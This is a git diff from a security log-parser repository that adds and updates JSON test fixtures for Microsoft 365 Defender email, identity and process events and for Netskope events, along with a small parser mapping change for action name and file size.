+ "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + "DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "3162398878", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "company.com", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@company.com" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<1@eu-west-1.test.com>", + "subject": "MAIL subject", + "to": { + "address": [ + "alan.smithee@company.com" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json new file mode 100644 index 000000000..d3b7b8c2f --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + "DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "2633942188", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "test.fr", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@test.fr" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<20241028141819.43623347A8F@test.fr>", + "subject": "EMAIL Subject", + "to": { + "address": [ + "alan.smithee@test.fr" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json index f2ac938fb..122a2bc61 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json @@ -3,7 +3,7 @@ "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}" }, "expected": { - "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "action": "Moved to quarantine", "category": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json index de75ec66d..0948ffe48 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json @@ -3,7 +3,7 @@ "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}" }, "expected": { - "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1-5-21-2308620423-2764619233-3639949770-5127445\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "category": [ "iam" diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json index 3a5d48cd4..2f5082094 100644 --- a/Microsoft/microsoft-365-defender/tests/test_process_error.json +++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json @@ -55,30 +55,36 @@ "-F", "smtpd_tls_protocols\\commandtest" ], - "code_signature": { - "status": "Unknown", - "subject_name": "Unknown" - }, "command_line": "grep -F smtpd_tls_protocols\\commandtest", - "executable": "/usr/test/platform-python3.6", - "hash": { - "md5": "eeeee2999444ddaaaaa08598b06eafe7", - "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6", - "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565" - }, - "name": "platform-python3.6", + "name": "grep", "parent": { + "args": [ + "--register", + "/usr/lib/python3.6/run.py" + ], + "code_signature": { + "status": "Unknown", + "subject_name": "Unknown" + }, + "command_line": "/usr/test/platform-python /usr/lib/python3.6/run.py --register", + "executable": "/usr/test/platform-python3.6", + "hash": { + "md5": "eeeee2999444ddaaaaa08598b06eafe7", + "sha1": "ff77777000aaaaaaaaaffb100000c0fb25ccccc6", + "sha256": "3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565" + }, "name": "platform-python3.6", - "pid": 408229, - "start": "2024-09-24T14:17:34.790000Z" + "pid": 408996, + "start": "2024-09-24T14:18:11.850000Z", + "user": { + "domain": "testdomain", + "name": "testaccount" + }, + "working_directory": "/usr/test" }, "pid": 408996, "start": "2024-09-24T14:18:11.864114Z", - "user": { - "domain": "testdomain", - "name": "testaccount" - }, - "working_directory": "/usr/test" + "working_directory": "/usr/bin" }, "related": { "hash": [ diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml index 1c33c07bc..b4606f079 100644 --- a/Netskope/netskope_events/ingest/parser.yml +++ b/Netskope/netskope_events/ingest/parser.yml @@ -37,6 +37,7 @@ stages: observer.vendor: "Netskope" event.dataset: "{{parsed_event.message.type}}" event.action: "{{parsed_event.message.activity}}" + action.name: "{{parsed_event.message.action or 'Allow'}}" event.reason: "{{parsed_event.message.audit_log_event or parsed_event.message.bypass_reason}}" event.duration: "{{parsed_event.message.conn_duration}}" user_agent.original: "{{parsed_event.message.user_agent}}" @@ -92,6 +93,9 @@ stages: - set: file.path: "{{parsed_event.message.file_path}}" filter: '{{parsed_event.message.file_path not in [None, "", "NA"]}}' + - set: + file.size: "{{parsed_event.message.file_size}}" + filter: "{{parsed_event.message.file_size not in [None, 0]}}" - translate: dictionary: "yes": "alert" diff --git a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json index 67944d71d..c564471d7 100644 --- a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json +++ b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T00:29:01Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json index 79f08033a..952e5c0b6 100644 --- a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json +++ b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T11:09:47Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_login_failed.json b/Netskope/netskope_events/tests/test_audit_log_login_failed.json index 8a05a5c15..05b0456e2 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_failed.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_failed.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T12:20:31Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_login_successful.json b/Netskope/netskope_events/tests/test_audit_log_login_successful.json index 1b4d67977..cf808efde 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_successful.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-12-22T16:38:07Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json index 8b4635920..fb06271d6 100644 --- a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-12-07T10:46:07Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json index b06db05ac..667c5755e 100644 --- a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2022-05-02T11:09:47Z", + "action": { + "name": "Allow" + }, "netskope": { "events": { "action": { diff --git a/Netskope/netskope_events/tests/test_connection_log.json b/Netskope/netskope_events/tests/test_connection_log.json index 29f3c0723..996cd6263 100644 --- a/Netskope/netskope_events/tests/test_connection_log.json +++ b/Netskope/netskope_events/tests/test_connection_log.json @@ -19,6 +19,9 @@ ] }, "@timestamp": "2022-12-21T16:12:20Z", + "action": { + "name": "Allow" + }, "destination": { "address": "5.6.7.8", "bytes": 0, diff --git a/Netskope/netskope_events/tests/test_dlp_incident.json b/Netskope/netskope_events/tests/test_dlp_incident.json index 66c901c90..b3cb772d3 100644 --- a/Netskope/netskope_events/tests/test_dlp_incident.json +++ b/Netskope/netskope_events/tests/test_dlp_incident.json @@ -16,6 +16,9 @@ ] }, "@timestamp": "2023-01-31T08:11:53Z", + "action": { + "name": "Allow" + }, "cloud": { "instance": { "id": "example.org" @@ -30,7 +33,8 @@ "hash": { "md5": "68b329da9893e34099c7d8ad5cb9c940" }, - "mime_type": "eicar.txt" + "mime_type": "eicar.txt", + "size": 19154 }, "http": { "request": { diff --git a/Netskope/netskope_events/tests/test_malware_alert.json b/Netskope/netskope_events/tests/test_malware_alert.json index 63497504d..e1a0a66c5 100644 --- a/Netskope/netskope_events/tests/test_malware_alert.json +++ b/Netskope/netskope_events/tests/test_malware_alert.json @@ -17,6 +17,9 @@ ] }, "@timestamp": "2022-12-21T14:12:08Z", + "action": { + "name": "Detection" + }, "destination": { "address": "5.6.7.8", "bytes": 0, @@ -36,7 +39,8 @@ "hash": { "md5": "68b329da9893e34099c7d8ad5cb9c940" }, - "name": "eicarcom2.zip" + "name": "eicarcom2.zip", + "size": 308 }, "host": { "name": "MacBook Pro", diff --git a/Netskope/netskope_events/tests/test_nspolicy_block.json b/Netskope/netskope_events/tests/test_nspolicy_block.json new file mode 100644 index 000000000..404b5d4ab --- /dev/null +++ b/Netskope/netskope_events/tests/test_nspolicy_block.json @@ -0,0 +1,112 @@ +{ + "input": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_type\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + "dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"55093de1d7b4571d8941f492\",\"access_method\":\"Client\",\"action\":\"block\",\"activity\":\"Browse\",\"alert\":\"yes\",\"app\":\"DNS Over HTTPS\",\"app_session_id\":1234567890,\"appcategory\":\"General\",\"browser\":\"Chrome\",\"browser_session_id\":2222222222222,\"category\":\"General\",\"cci\":\"\",\"ccl\":\"unknown\",\"connection_id\":0,\"count\":1,\"device\":\"Windows Device\",\"device_classification\":\"unmanaged\",\"dst_country\":\"US\",\"dst_latitude\":37.775699615478516,\"dst_location\":\"San Francisco\",\"dst_longitude\":-122.39520263671875,\"dst_region\":\"California\",\"dst_timezone\":\"America/Los_Angeles\",\"dst_zipcode\":\"N/A\",\"dstip\":\"1.2.3.4\",\"dstport\":443,\"hostname\":\"PC-HOST01\",\"ja3\":\"1234567890abcdef1234567890abcdef\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"netskope_pop\":\"FR-PAR2\",\"notify_template\":\"silent_block.html\",\"organization_unit\":\"\",\"os\":\"Windows 11\",\"os_version\":\"Windows NT 11.0\",\"other_categories\":[\"Technology\",\"General\"],\"page\":\"test.example.com\",\"page_site\":\"test\",\"policy\":\"Block DoH - incompatibility with Netskope\",\"policy_id\":\"99999999999999999999999999999999 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 